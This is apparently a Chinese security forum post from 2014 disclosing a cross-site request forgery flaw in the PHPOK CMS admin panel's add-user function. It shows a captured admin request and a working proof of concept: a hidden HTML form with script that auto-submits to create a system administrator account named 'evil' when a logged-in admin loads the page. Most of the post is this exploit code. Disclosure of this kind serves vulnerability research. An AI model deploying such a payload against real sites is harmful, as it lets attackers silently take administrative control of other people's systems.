添加用户:
抓包抓到如下内容:
[AppleScript] 纯文本查看 复制代码 POST /phpok/admin.php?c=admin&f=save HTTP/1.1
Host: [url]www.evil.com[/url]
Proxy-Connection: keep-alive
Content-Length: 67
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: [url]http://www.evil.com[/url]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: [url]http://www.evil.com/phpok/admin.php?c=admin&f=set[/url]
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSION=c003810ffea32e03358eb66d6a1a81cb
id=&account=poc&pass=poc123&email=poc%40qq.com&status=1&if_system=1
发现没有加token,查看源码也没有看到判断referer。 所以可能存在CSRF,于是构造如下POC:
[AppleScript] 纯文本查看 复制代码 <div style="display:none">
<form action="http://www.evil.com/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">
<input type="hidden" name="id" value=""/>
<input type="hidden" name="account" value=""/>
<input type="hidden" name="pass" value=""/>
<input type="hidden" name="email" value=""/>
<input type="hidden" name="status" value=""/>
<input type="hidden" name="if_system" value=""/>
<input type="submit" name="up" value"submit"/>
</form>
<script>
var t = document.poc;
t.account.value="evil";
t.pass.value="evil";
t.email.value="evil@qq.com";
t.status.value="1";
t.if_system.value="1";
document.poc.submit();
</script>
</div> | 
发表于 2014-5-4 09:19:58
发表于 2014-5-4 21:07:32
